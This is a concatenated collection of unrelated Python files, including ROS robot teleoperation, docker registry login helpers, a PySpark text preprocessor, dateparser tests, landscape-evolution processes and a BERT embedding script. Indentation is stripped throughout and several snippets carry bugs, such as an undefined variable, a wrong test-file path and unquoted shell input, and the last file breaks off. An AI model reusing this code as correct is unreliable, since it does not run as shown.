traj.xyz_points.append(xyz_knot)
traj.ee_frame_id = ee_frame_id
traj.time_from_start.append(rospy.Duration(0.0))
traj.time_from_start.append(rospy.Duration(duration))
quat_msg = geometry_msgs.msg.Quaternion()
quat_msg.w = quat[0]
quat_msg.x = quat[1]
quat_msg.y = quat[2]
quat_msg.z = quat[3]
traj.quaternions.append(quat_msg)
traj.quaternions.append(quat_msg)
return goal
def make_cartesian_gains_msg(kp_rot, kp_trans):
msg = robot_msgs.msg.CartesianGain()
msg.rotation.x = kp_rot
msg.rotation.y = kp_rot
msg.rotation.z = kp_rot
msg.translation.x = kp_trans
msg.translation.y = kp_trans
msg.translation.z = kp_trans
return msg
def make_force_guard_msg(scale):
msg = robot_msgs.msg.ForceGuard()
external_force = robot_msgs.msg.ExternalForceGuard()
body_frame = "iiwa_link_ee"
expressed_in_frame = "iiwa_link_ee"
force_vec = scale*np.array([-1,0,0])
external_force.force.header.frame_id = expressed_in_frame
external_force.body_frame = body_frame
external_force.force.vector.x = force_vec[0]
external_force.force.vector.y = force_vec[1]
external_force.force.vector.z = force_vec[2]
msg.external_force_guards.append(external_force)
return msg
def make_move_goal(trans, quat, duration):
goal = make_cartesian_trajectory_goal_world_frame(
pos = trans,
quat = quat,
duration = duration)
goal.gains.append(make_cartesian_gains_msg(20, 20.))
goal.force_guard.append(make_force_guard_msg(15.))
return goal
def ro(quat):
return [quat[1], quat[2], quat[3], quat[0]]
def tf_matrix_from_pose(pose):
trans, quat = pose
mat = transformations.quaternion_matrix(quat)
mat[:3, 3] = trans
return mat
def get_relative_tf_between_poses(pose_1, pose_2):
tf_1 = tf_matrix_from_pose(pose_1)
tf_2 = tf_matrix_from_pose(pose_2)
return np.linalg.inv(tf_1).dot(tf_2)
def build_rbt_from_ros_environment():
robot = RigidBodyTree()
package_map = PackageMap()
package_map.PopulateFromEnvironment("ROS_PACKAGE_PATH")
base_dir = getDrakePath()
weld_frame = None
floating_base_type = FloatingBaseType.kFixed
robot = RigidBodyTree()
AddModelInstanceFromUrdfStringSearchingInRosPackages(
rospy.get_param("/robot_description"),
package_map,
base_dir,
floating_base_type,
weld_frame,
robot)
return robot
def do_main():
rospy.init_node('gamepad_teleop', anonymous=True)
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
robotSubscriber = JointStateSubscriber("/joint_states")
robotSubscriber = ros_utils.JointStateSubscriber("/joint_states")
rospy.loginfo("Waiting for full kuka state...")
while len(robotSubscriber.joint_positions.keys()) < 3:
rospy.sleep(0.1)
rospy.loginfo("got full state")
rospy.loginfo("Grabbing controller...")
pygame.init()
pygame.joystick.init()
joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
rospy.loginfo("Found %d controllers" % len(joysticks))
if len(joysticks) == 0:
rospy.logerr("Didn't find a controller :(.")
sys.exit(-1)
joystick = joysticks[0]
joystick.init()
rospy.loginfo("Using joystick %s" % joystick.get_name())
handDriver = SchunkDriver()
gripper_goal_pos = 0.1
# Start by moving to an above-table pregrasp pose that we know
# EE control will work well from (i.e. far from singularity)
above_table_pre_grasp = [0.04486168762069299, 0.3256606458812486, -0.033502080520812445, -1.5769091802934694, 0.05899249087322813, 1.246379583616529, 0.38912999977004026]
robotService = ros_utils.RobotService.makeKukaRobotService()
success = robotService.moveToJointPosition(above_table_pre_grasp, timeout=5)
print("Moved to position")
# Then kick off task space streaming
sp = rospy.ServiceProxy('plan_runner/init_task_space_streaming',
robot_msgs.srv.StartStreamingPlan)
init = robot_msgs.srv.StartStreamingPlanRequest()
init.force_guard.append(make_force_guard_msg(20.))
print sp(init)
print("Started task space streaming")
pub = rospy.Publisher('plan_runner/task_space_streaming_setpoint',
robot_msgs.msg.CartesianGoalPoint, queue_size=1)
tf_ee = None
def cleanup():
rospy.wait_for_service("plan_runner/stop_plan")
sp = rospy.ServiceProxy('plan_runner/stop_plan',
std_srvs.srv.Trigger)
init = std_srvs.srv.TriggerRequest()
print sp(init)
print("Done cleaning up and stopping streaming plan")
frame_name = "iiwa_link_ee"
# origin_tf, in the above EE frame
origin_tf = transformations.euler_matrix(0.0, 0., 0.)
origin_tf[0:3, 3] = np.array([0.15, 0.0, 0.0])
origin_tf_inv = np.linalg.inv(origin_tf)
rospy.on_shutdown(cleanup)
br = tf.TransformBroadcaster()
try:
last_gripper_update_time = time.time()
last_update_time = time.time()
while not rospy.is_shutdown():
#for axis_i in range(joystick.get_numaxes()):
# rospy.loginfo("Axis %d: %f" % (axis_i, joystick.get_axis(axis_i)))
#for button_i in range(joystick.get_numbuttons()):
# rospy.loginfo("Button %d: %f" % (button_i, joystick.get_button(button_i)))
#time.sleep(0.5)
# Gamepad: Logitech 310
# DPad: Axis 1 +1 is down
# Axis 0 +1 is right
# Left stick: Axis 7 +1 is down
# Axis 6 +1 is right
# Right stick: Axis 3 +1 is right
# Axis 4 +1 is down
# Left bumper: Button 4
# Right bumper: Button 5
gripper_dt = time.time() - last_gripper_update_time
dt = time.time() - last_update_time
pygame.event.pump()
if gripper_dt > 0.2:
last_gripper_update_time = time.time()
gripper_goal_pos += (joystick.get_button(5) - joystick.get_button(4))*dt*0.05
gripper_goal_pos = max(min(gripper_goal_pos, 0.1), 0.0)
handDriver.sendGripperCommand(gripper_goal_pos, speed=0.1, timeout=0.01)
print "Gripper goal pos: ", gripper_goal_pos
br.sendTransform(origin_tf[0:3, 3],
ro(transformations.quaternion_from_matrix(origin_tf)),
rospy.Time.now(),
"origin_tf",
frame_name)
try:
current_pose_ee = ros_utils.poseFromROSTransformMsg(
tfBuffer.lookup_transform("base", frame_name, rospy.Time()).transform)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
print("Troubling looking up tf...")
rate.sleep()
continue
if dt > 0.01:
last_update_time = time.time()
if tf_ee is None:
tf_ee = tf_matrix_from_pose(current_pose_ee)
tf_ee[0, 3] += -1.*joystick.get_axis(7)*dt*0.25
tf_ee[1, 3] += -1.*joystick.get_axis(6)*dt*0.25
tf_ee[2, 3] += -1.*joystick.get_axis(4)*dt*0.25
dr = -1.*joystick.get_axis(0)*dt
dp = 1.*joystick.get_axis(1)*dt
dy = -1.*joystick.get_axis(3)*dt
tf_ee = tf_ee.dot(transformations.euler_matrix(dr, 0., 0.))
tf_ee = tf_ee.dot(transformations.euler_matrix(0, dp, 0.))
tf_ee = tf_ee.dot(transformations.euler_matrix(0., 0., dy))
target_trans_ee = tf_ee[:3, 3]
target_quat_ee = transformations.quaternion_from_matrix(tf_ee)
new_msg = robot_msgs.msg.CartesianGoalPoint()
new_msg.xyz_point.header.frame_id = "world"
new_msg.xyz_point.point.x = target_trans_ee[0]
new_msg.xyz_point.point.y = target_trans_ee[1]
new_msg.xyz_point.point.z = target_trans_ee[2]
new_msg.xyz_d_point.x = 0.
new_msg.xyz_d_point.y = 0.
new_msg.xyz_d_point.z = 0.0
new_msg.quaternion.w = target_quat_ee[0]
new_msg.quaternion.x = target_quat_ee[1]
new_msg.quaternion.y = target_quat_ee[2]
new_msg.quaternion.z = target_quat_ee[3]
new_msg.gain = make_cartesian_gains_msg(5., 10.)
new_msg.ee_frame_id = frame_name
pub.publish(new_msg)
except Exception as e:
print "Suffered exception ", e
if __name__ == "__main__":
do_main()
|
105164
|
import boto3
from kaos_backend.constants import DOCKER_REGISTRY, REGION, CLOUD_PROVIDER
def get_login_command():
if CLOUD_PROVIDER == 'AWS':
# ecr = boto3.client('ecr', region_name=REGION)
#
# raw_auth_data = ecr.get_authorization_token()['authorizationData'][0]['authorizationToken']
# _, docker_auth_token = b64decode(raw_auth_data).decode('UTF-8').split(":")
return f"$(aws ecr get-login --region {REGION} --no-include-email)"
elif CLOUD_PROVIDER == "GCP":
return f"gcloud auth print-access-token | docker login -u oauth2accesstoken --password-stdin https://{DOCKER_REGISTRY}"
else:
return ""
def create_docker_repo(repo_name):
if CLOUD_PROVIDER == 'AWS':
ecr = boto3.client('ecr', region_name=REGION)
ecr.create_repository(repositoryName=repo_name)
def delete_docker_repo(repo_name):
if CLOUD_PROVIDER == 'AWS':
ecr = boto3.client('ecr', region_name=REGION)
ecr.delete_repository(repositoryName=repo_name, force=True)
|
105207
|
from .unet import *
from .vae import *
from .others import *
from .pconv_unet import *
from .discriminator import *
from .resnet_cls import *
|
105233
|
from pyspark.sql import SparkSession
from pyspark.sql.functions import udf
from pyspark.sql.types import *
from pyspark.rdd import RDD
from pyspark.mllib.linalg import SparseVector, VectorUDT, Vectors
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
import re
import numpy as np
#data preprocessing class
class preprocessor(object):
'''
preprocessor for Reuters news articles corpus
parameters:
- bigrams: bool
if set to True, will use bigrams and unigrams in term frequency or tf-idf (default)
if set to False, will only use unigrams in term frequency or tf-idf
- min_df: int
minimum number of times a word or bigram must appear in document to be included as a feature (default 2)
- stemming: bool
if set to True, words are stemmed when tokenized (default)
if set to False, words are not stemmed when tokenized
- tfidf: bool
if set to True, tf-idf vectorization is used (default)
if set to False, term frequency vectorization is used
methods:
- transform(X,y)
convert text and labels into tf-idf dataframe for classifier
parameters:
- X: pyspark rdd
rdd with text as rows
- y: pyspark rdd (optional)
rdd with labels as rows
requires following non-standard python packages
- nltk.corpus.stopwords
- nltk.stem.snowball.SnowballStemmer
- numpy
'''
def __init__(self,bigrams=True,min_df=3,stemming=True,tfidf=True):
self.regex = re.compile('[^a-zA-Z ]')
self.stop = set(stopwords.words('english'))
self.stemmer = SnowballStemmer("english")
self.bigrams = bigrams
self.min_df = min_df
self.stemming = stemming
self.tfidf = tfidf
def _tokenize(self, row):
'''
clean texts by removing special and non-chars
stems each word and removes stop words
return list of tokenized words for each row
'''
chars = re.sub(r'-|"|&',' ',row) #replace dashes, quotes, and ampersands
chars = self.regex.sub('',chars) # remove nonchars
wordlist = str(chars).split()
if self.stemming:
wordlist = [self.stemmer.stem(word.lower()) for word in wordlist if word.lower() not in self.stop] # stem and remove stopwords
else:
wordlist = [word.lower() for word in wordlist if word.lower() not in self.stop]
#create bigrams if enabled
if self.bigrams:
bigrams = []
for i in range(len(wordlist)-1):
bigrams.append(wordlist[i]+" "+wordlist[i+1])
wordlist = wordlist + bigrams
return wordlist
def _term_frequency(self,row):
'''
convert row of word token se into sparse vector of term frequencies
'''
sparse_dic = {}
for word in row:
if word in self.dictionary:
if self.dictionary[word] in sparse_dic:
sparse_dic[self.dictionary[word]] += 1.
else:
sparse_dic[self.dictionary[word]] = 1.
tf = SparseVector(len(self.dictionary),sparse_dic)
return tf
def _tf_idf(self,row):
'''
convert row of word token counts into sparse vector of tfidf frequencies
'''
sparse_dic = {}
df_dic = {}
for word in row:
if word in self.dictionary:
if self.dictionary[word] in sparse_dic:
sparse_dic[self.dictionary[word]] += 1.
else:
sparse_dic[self.dictionary[word]] = 1.
if word in self.doc_freq:
df_dic[self.dictionary[word]] = self.doc_freq[word]
else:
df_dic[self.dictionary[word]] = 1
for key in sparse_dic:
sparse_dic[key] = (1+np.log(sparse_dic[key]))*(np.log10(float(self.doc_count)/df_dic[key]))
tfidf = SparseVector(len(self.dictionary),sparse_dic)
return tfidf
def transform(self,X,y=None,train=True):
'''
convert input RDDs into dataframe of features and labels
'''
#check input type
if type(X) != RDD:
raise TypeError("Arguments must be pySpark RDDs")
if y and type(y) != RDD:
raise TypeError("Arguments must be pySpark RDDs")
#word tokenization
X = X.map(self._tokenize).cache()
#create dictionary of words
if train:
self.dictionary = X.flatMap(lambda word: word).map(lambda word: (word,1)).reduceByKey(lambda acc, w: acc + w).filter(lambda x: x[1]>=self.min_df).collectAsMap()
self.dictionary = dict(zip(self.dictionary,xrange(len(self.dictionary))))
#populate word count dictionary
if self.tfidf:
self.doc_freq = X.map(lambda wordlist: set(wordlist)).flatMap(lambda word: word).map(lambda word: (word,1)).reduceByKey(lambda acc, w: acc + w).filter(lambda x: x[1]>=2).collectAsMap()
self.doc_count = X.count()
#create word vectors
if self.tfidf:
X = X.map(self._tf_idf)
else:
X = X.map(self._term_frequency)
#check if labels exist
if y:
#combine X and y into single dataframe
X = X.zipWithIndex().map(lambda r: (r[1],r[0]))
y = y.zipWithIndex().map(lambda r: (r[1],r[0]))
data = X.join(y).map(lambda r: r[1])
df = data.toDF(['features','label'])
#one hot encoding for labels
CCAT = udf(lambda l: 1 if "CCAT" in l else 0, IntegerType())
ECAT = udf(lambda l: 1 if "ECAT" in l else 0, IntegerType())
GCAT = udf(lambda l: 1 if "GCAT" in l else 0, IntegerType())
MCAT = udf(lambda l: 1 if "MCAT" in l else 0, IntegerType())
df = df.withColumn("CCAT",CCAT(df['label']))
df = df.withColumn("ECAT",ECAT(df['label']))
df = df.withColumn("GCAT",GCAT(df['label']))
df = df.withColumn("MCAT",MCAT(df['label']))
df = df.select('features','CCAT','ECAT','GCAT','MCAT')
else:
X = X.map(lambda row: [row])
schema = StructType([StructField("features", VectorUDT(), True)])
df = X.toDF(schema)
return df
if __name__ == '__main__':
#initialize spark session
spark = SparkSession\
.builder\
.appName("Test")\
.config('spark.sql.warehouse.dir', 'file:///C:/')\
.getOrCreate()
sc = spark.sparkContext
#load data
X_file = "./data/X_train_vsmall.txt"
y_file = "./data/y_train_vsmall.txt"
data = sc.textFile(X_file)
labels = sc.textFile(y_file)
#process data
p1 = preprocessor(bigrams=True,stemming=True,tfidf=True)
df = p1.transform(data,labels)
print df.show()
print df.printSchema()
print df.select('features').rdd.first()
#save to parquet
try:
df.write.save("./data/df_train_vsmall.parquet")
except:
pass
#test without labels
X_test = "./data/X_test_vsmall.txt"
data = sc.textFile(X_file)
p2 = preprocessor(bigrams=False,stemming=True,tfidf=True)
df_no_y = p2.transform(data)
print df_no_y.show()
print df_no_y.printSchema()
print df_no_y.select('features').rdd.first()
try:
df_no_y.write.save("./data/df_test_vsmall.parquet")
except:
pass
spark.stop()
|
105280
|
s = input()
s = s.upper()
c = 0
for i in ("ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
for j in s:
if(i!=j):
c = 0
else:
c = 1
break
if(c==0):
break
if c==1:
print("Pangram exists")
else:
print("Pangram doesn't exists")
|
105299
|
from .audio_provider import AudioProvider
from .visual_provider import VisualProvider
from .multifile_audiovisual_provider import MultiFile_AVProvider
from .singlefile_audiovisual_provider import SingleFile_AVProvider
|
105318
|
from django_mptt_acl.rules import DefaultRoleRule
class ManageRole(object):
name = 'manage'
permissions = ('read', 'update', 'delete', 'invite', 'create')
required_permissions_ancestors = ('read',)
required_permissions_descendants = permissions
rules = (DefaultRoleRule,)
|
105357
|
from datetime import date, datetime
from pytz import utc
from parameterized import parameterized, param
import dateparser
from tests import BaseTestCase
class TestParseFunction(BaseTestCase):
def setUp(self):
super().setUp()
self.result = NotImplemented
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", expected_date=date(2014, 1, 24)),
param(date_string="2 de Enero de 2013", expected_date=date(2013, 1, 2)),
param(date_string="January 25, 2014", expected_date=date(2014, 1, 25)),
])
def test_parse_dates_in_different_languages(self, date_string, expected_date):
self.when_date_is_parsed_with_defaults(date_string)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="May 5, 2000 13:00",
expected_date=datetime(2000, 5, 5, 13, 0)),
param(date_string="August 8, 2018 5 PM",
expected_date=datetime(2018, 8, 8, 17, 0)),
param(date_string="February 26, 1981 5 am UTC",
expected_date=datetime(1981, 2, 26, 5, 0, tzinfo=utc)),
])
def test_parse_dates_with_specific_time(self, date_string, expected_date):
self.when_date_is_parsed_with_defaults(date_string)
self.then_parsed_date_and_time_is(expected_date)
@parameterized.expand([
param(date_string="May 5, 2000 13:00",
expected_date=datetime(2000, 5, 5, 13, 0),
relative=datetime(2000, 1, 1, 0, 0, tzinfo=utc)),
param(date_string="August 8, 2018 5 PM",
expected_date=datetime(2018, 8, 8, 17, 0),
relative=datetime(1900, 5, 5, 0, 0, tzinfo=utc)),
param(date_string="February 26, 1981 5 am UTC",
expected_date=datetime(1981, 2, 26, 5, 0, tzinfo=utc),
relative=datetime(1981, 2, 26, 5, 0, tzinfo=utc)),
])
def test_parse_dates_with_specific_time_and_settings(self, date_string, expected_date, relative):
self.when_date_is_parsed_with_settings(date_string, settings={'RELATIVE_BASE': relative})
self.then_parsed_date_and_time_is(expected_date)
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", languages=['pt'], expected_date=date(2014, 1, 24)),
])
def test_dates_which_match_languages_are_parsed(self, date_string, languages, expected_date):
self.when_date_is_parsed(date_string, languages=languages)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="January 24, 2014", languages=['pt']),
])
def test_dates_which_do_not_match_languages_are_not_parsed(self, date_string, languages):
self.when_date_is_parsed(date_string, languages=languages)
self.then_date_was_not_parsed()
@parameterized.expand([
param(date_string="24 de Janeiro de 2014", locales=['pt-TL'], expected_date=date(2014, 1, 24)),
])
def test_dates_which_match_locales_are_parsed(self, date_string, locales, expected_date):
self.when_date_is_parsed(date_string, locales=locales)
self.then_parsed_date_is(expected_date)
@parameterized.expand([
param(date_string="January 24, 2014", locales=['pt-AO']),
])
def test_dates_which_do_not_match_locales_are_not_parsed(self, date_string, locales):
self.when_date_is_parsed(date_string, locales=locales)
self.then_date_was_not_parsed()
def when_date_is_parsed_with_defaults(self, date_string):
self.result = dateparser.parse(date_string)
def when_date_is_parsed(self, date_string, languages=None, locales=None):
self.result = dateparser.parse(date_string, languages=languages, locales=locales)
def when_date_is_parsed_with_settings(self, date_string, settings=None):
self.result = dateparser.parse(date_string, settings=settings)
def then_parsed_date_is(self, expected_date):
self.assertEqual(self.result, datetime.combine(expected_date, datetime.min.time()))
def then_parsed_date_and_time_is(self, expected_date):
self.assertEqual(self.result, expected_date)
def then_date_was_not_parsed(self):
self.assertIsNone(self.result)
|
105358
|
import fastscapelib_fortran as fs
import numpy as np
import xsimlab as xs
from .grid import UniformRectilinearGrid2D
@xs.process
class TotalVerticalMotion:
"""Sum up all vertical motions of bedrock and topographic surface,
respectively.
Vertical motions may result from external forcing, erosion and/or
feedback of erosion on tectonics (isostasy).
"""
bedrock_upward_vars = xs.group('bedrock_upward')
surface_upward_vars = xs.group('surface_upward')
surface_downward_vars = xs.group('surface_downward')
bedrock_upward = xs.variable(
dims=('y', 'x'),
intent='out',
description='bedrock motion in upward direction'
)
surface_upward = xs.variable(
dims=('y', 'x'),
intent='out',
description='topographic surface motion in upward direction'
)
def run_step(self):
self.bedrock_upward = sum(self.bedrock_upward_vars)
self.surface_upward = (sum(self.surface_upward_vars) -
sum(self.surface_downward_vars))
@xs.process
class SurfaceTopography:
"""Update the elevation of the (land and/or submarine) surface
topography.
"""
elevation = xs.variable(
dims=('y', 'x'),
intent='inout',
description='surface topography elevation'
)
motion_upward = xs.foreign(TotalVerticalMotion, 'surface_upward')
def finalize_step(self):
self.elevation += self.motion_upward
@xs.process
class SurfaceToErode:
"""Defines the topographic surface used for the computation of erosion
processes.
In this process class, it simply corresponds to the topographic
surface, unchanged, at the current time step.
Sometimes it would make sense to compute erosion processes after
having applied other processes such as tectonic forcing. This
could be achieved by subclassing.
"""
topo_elevation = xs.foreign(SurfaceTopography, 'elevation')
elevation = xs.variable(
dims=('y', 'x'),
intent='out',
description='surface elevation before erosion'
)
def run_step(self):
self.elevation = self.topo_elevation
@xs.process
class Bedrock:
"""Update the elevation of bedrock (i.e., land and/or submarine
basement).
"""
elevation = xs.variable(
dims=('y', 'x'),
intent='inout',
description='bedrock elevation'
)
depth = xs.on_demand(
dims=('y', 'x'),
description='bedrock depth below topographic surface'
)
bedrock_motion_up = xs.foreign(TotalVerticalMotion, 'bedrock_upward')
surface_motion_up = xs.foreign(TotalVerticalMotion, 'surface_upward')
surface_elevation = xs.foreign(SurfaceTopography, 'elevation')
@depth.compute
def _depth(self):
return self.surface_elevation - self.elevation
def initialize(self):
if np.any(self.elevation > self.surface_elevation):
raise ValueError("Encountered bedrock elevation higher than "
"topographic surface elevation.")
def run_step(self):
self._elevation_next = np.minimum(
self.elevation + self.bedrock_motion_up,
self.surface_elevation + self.surface_motion_up
)
def finalize_step(self):
self.elevation = self._elevation_next
@xs.process
class UniformSedimentLayer:
"""Uniform sediment (or regolith, or soil) layer.
This layer has uniform properties (undefined in this class) and
generally undergo under active erosion, transport and deposition
processes.
"""
surf_elevation = xs.foreign(SurfaceTopography, 'elevation')
bedrock_elevation = xs.foreign(Bedrock, 'elevation')
thickness = xs.variable(
dims=('y', 'x'),
intent='out',
description='sediment layer thickness'
)
@thickness.compute
def _get_thickness(self):
return self.surf_elevation - self.bedrock_elevation
def initialize(self):
self.thickness = self._get_thickness()
def run_step(self):
self.thickness = self._get_thickness()
@xs.process
class TerrainDerivatives:
"""Compute, on demand, terrain derivatives such as slope or
curvature.
"""
shape = xs.foreign(UniformRectilinearGrid2D, 'shape')
spacing = xs.foreign(UniformRectilinearGrid2D, 'spacing')
elevation = xs.foreign(SurfaceTopography, 'elevation')
slope = xs.on_demand(
dims=('y', 'x'),
description='terrain local slope'
)
curvature = xs.on_demand(
dims=('y', 'x'),
description='terrain local curvature'
)
@slope.compute
def _slope(self):
slope = np.empty_like(self.elevation)
ny, nx = self.shape
dy, dx = self.spacing
fs.slope(self.elevation.ravel(), slope.ravel(), nx, ny, dx, dy)
return slope
@curvature.compute
def _curvature(self):
curv = np.empty_like(self.elevation)
ny, nx = self.shape
dy, dx = self.spacing
fs.curvature(self.elevation.ravel(), curv.ravel(), nx, ny, dx, dy)
return curv
@xs.process
class StratigraphicHorizons:
"""Generate a fixed number of stratigraphic horizons.
A horizon is active, i.e., it tracks the evolution of the
land/submarine topographic surface until it is "frozen" at a given
time. Beyond this freezing (or deactivation) time, the horizon
will only be affected by tectonic deformation and/or erosion.
To compute diagnostics on those horizons, you can create a
subclass where you can add "on_demand" variables.
"""
freeze_time = xs.variable(
dims='horizon',
description='horizon freezing (deactivation) time',
static=True
)
horizon = xs.index(dims='horizon', description='horizon number')
active = xs.variable(
dims='horizon',
intent='out',
description='whether the horizon is active or not'
)
surf_elevation = xs.foreign(SurfaceTopography, 'elevation')
elevation_motion = xs.foreign(TotalVerticalMotion, 'surface_upward')
bedrock_motion = xs.foreign(TotalVerticalMotion, 'bedrock_upward')
elevation = xs.variable(
dims=('horizon', 'y', 'x'),
intent='out',
description='elevation of horizon surfaces'
)
@xs.runtime(args='sim_start')
def initialize(self, start_time):
if np.any(self.freeze_time < start_time):
raise ValueError("'freeze_time' value must be greater than the "
"time of the beginning of the simulation")
self.elevation = np.repeat(self.surf_elevation[None, :, :],
self.freeze_time.size,
axis=0)
self.horizon = np.arange(0, len(self.freeze_time))
self.active = np.full_like(self.freeze_time, True, dtype=bool)
@xs.runtime(args='step_start')
def run_step(self, current_time):
self.active = current_time < self.freeze_time
def finalize_step(self):
elevation_next = self.surf_elevation + self.elevation_motion
self.elevation[self.active] = elevation_next
self.elevation[~self.active] = np.minimum(
self.elevation[~self.active] + self.bedrock_motion,
elevation_next
)
|
105397
|
import arcade
import imgui
import imgui.core
from imdemo.page import Page
class Rect(Page):
def draw(self):
imgui.begin("Rectangle")
draw_list = imgui.get_window_draw_list()
p1 = self.rel(20, 35)
p2 = self.rel(90, 80)
draw_list.add_rect(*p1, *p2, imgui.get_color_u32_rgba(1,1,0,1), thickness=3)
p1 = self.rel(110, 35)
p2 = self.rel(180, 80)
draw_list.add_rect(*p1, *p2, imgui.get_color_u32_rgba(1,0,0,1), rounding=5, thickness=3)
imgui.end()
class RectFilled(Page):
def draw(self):
imgui.begin("Rectangle Filled")
draw_list = imgui.get_window_draw_list()
p1 = self.rel(20, 35)
p2 = self.rel(90, 80)
draw_list.add_rect_filled(*p1, *p2, imgui.get_color_u32_rgba(1,1,0,1))
p1 = self.rel(110, 35)
p2 = self.rel(180, 80)
draw_list.add_rect_filled(*p1, *p2, imgui.get_color_u32_rgba(1,0,0,1), 5)
imgui.end()
def install(app):
app.add_page(Rect, "rect", "Rectangle")
app.add_page(RectFilled, "rectfilled", "Rectangle Filled")
|
105399
|
import tomotopy as tp
model = tp.DTModel()
print(model.alpha)
# print(model.eta)
print(model.lr_a)
print(model.lr_b)
print(model.lr_c)
print(model.num_timepoints)
print(model.num_docs_by_timepoint)
model.add_doc(["new", "document"], timepoint=0)
|
105406
|
import argparse
from agutil import status_bar
import subprocess
import csv
import shutil
from qtl.annotation import Annotation
import tempfile
def run(args):
print("Parsing GTF")
gtf = Annotation(args.gtf.name)
print("Parsing GCT")
numRows = int(subprocess.check_output("wc -l %s" % args.gct.name, shell=True).decode().strip().split()[0]) - 3
header = ''.join([next(args.gct), next(args.gct)])
reader = csv.DictReader(args.gct, delimiter='\t')
w = tempfile.NamedTemporaryFile('w')
w.write(header)
writer = csv.DictWriter(w, reader.fieldnames, delimiter='\t', lineterminator='\n')
writer.writeheader()
current = None
features = []
for line in status_bar.iter(reader, maximum=numRows):
gene = '_'.join(line['Name'].split('_')[:-1])
if gene != current:
if current is not None:
ref = gtf.get_gene(current)
try:
if len(ref):
ref = ref[0]
except:
pass
exons = {exon.id:exon for transcript in ref.transcripts for exon in transcript.exons}
raw_size = len(exons)
for exon in [exon for exon in exons]:
try:
if exon.isdigit() and int(exon) <= raw_size:
exons[current+'_'+exon] = exons[exon]
except:
pass
features.sort(
key=lambda feat:(
1 if exons[feat['Name']].length == 1 else 0,
exons[feat['Name']].start_pos,
exons[feat['Name']].end_pos
)
)
for i in range(len(features)):
parts = features[i]['Name'].split('_')
prefix = '_'.join(parts[:-1])
suffix = parts[-1]
if exons[features[i]['Name']].length == 1:
features[i][reader.fieldnames[-1]] = 0
suffix = str(i)
features[i]['Name'] = prefix+'_'+suffix
writer.writerows(features)
current = gene
features = []
features.append({k:v for k,v in line.items()})
if len(features):
ref = gtf.get_gene(current)
try:
if len(ref):
ref = ref[0]
except:
pass
exons = {exon.id:exon for transcript in ref.transcripts for exon in transcript.exons}
raw_size = len(exons)
for exon in [exon for exon in exons]:
try:
if exon.isdigit() and int(exon) <= raw_size:
exons[current+'_'+exon] = exons[exon]
except:
pass
features.sort(
key=lambda feat:(
1 if exons[feat['Name']].length == 1 else 0,
exons[feat['Name']].start_pos,
exons[feat['Name']].end_pos
)
)
for i in range(len(features)):
prefix, suffix = features[i]['Name'].split('_')
if exons[features[i]['Name']].length == 1:
features[i]['Counts'] = 0
suffix = str(i)
features[i]['Name'] = prefix+'_'+suffix
writer.writerows(features)
print("Cleaning up")
w.flush()
args.gct.close()
shutil.copyfile(
args.gct.name,
args.gct.name+'.bak'
)
shutil.copyfile(
w.name,
args.gct.name
)
def main():
parser = argparse.ArgumentParser('flipper')
parser.add_argument(
'gct',
type=argparse.FileType('r'),
help="RNA-SeQC 2 Exon reads gct file"
)
parser.add_argument(
'gtf',
type=argparse.FileType('r'),
help="Reference GTF for the exons"
)
args = parser.parse_args()
run(args)
if __name__ == '__main__':
main()
|
105466
|
import os
import subprocess
import argparse
import torch
import json
# import h5py
import gzip, csv
import numpy as np
from tqdm import tqdm
from torch.nn.utils.rnn import pad_sequence
from transformers import *
def get_sentence_features(batches, tokenizer, model, device, maxlen=500):
features = tokenizer.batch_encode_plus(batches, padding=True,
return_attention_mask=True, return_token_type_ids=True,
truncation=True, max_length=maxlen)
attention_mask = torch.tensor(features['attention_mask'], device=device)
input_ids = torch.tensor(features['input_ids'], device=device)
token_type_ids=torch.tensor(features['token_type_ids'], device=device)
# (batch, seq_len, nfeature)
token_embeddings = model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids)[0]
# mean of embeddings as sentence embeddings
embeddings = (attention_mask.unsqueeze(-1) * token_embeddings).sum(1) / attention_mask.sum(1).unsqueeze(-1)
return embeddings
def hdf5_create_dataset(group, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
group.create_dataset(f'{cur}', embed.shape,
dtype='float32' if not fp16 else 'float16', data=embed)
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
group.create_dataset(f'{cur}', embed.shape,
dtype='float32' if not fp16 else 'float16', data=embed)
cur += 1
def jsonl_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
fout = open(output_file, 'w')
with open(input_file, 'r') as fin:
batches = []
cur = 0
for i, line in enumerate(fin):
batches.append(line.strip())
if (i+1) % batch_size == 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
fout.write(json.dumps({cur: embed.tolist()}))
fout.write('\n')
cur += 1
pbar.update(len(batches))
batches = []
if len(batches) > 0:
with torch.no_grad():
embeddings = get_sentence_features(batches, tokenizer, model, device)
for j, embed in enumerate(embeddings):
embed = embed.cpu().numpy()
if fp16:
embed = embed.astype('float16')
fout.write(json.dumps({cur: embed.tolist()}))
fout.write('\n')
cur += 1
fout.close()
def csv_create_dataset(output_file, input_file, fp16=False):
global tokenizer, model, device
print(f'precompute embeddings for {input_file}')
pbar = tqdm()
fout = gzip.open(output_file, 'wt')
# fout = open(output_file, 'w')
fieldnames = ['embedding']
writer = csv.DictWriter(fout, fieldnames=fieldnames)
writer.writeheader()
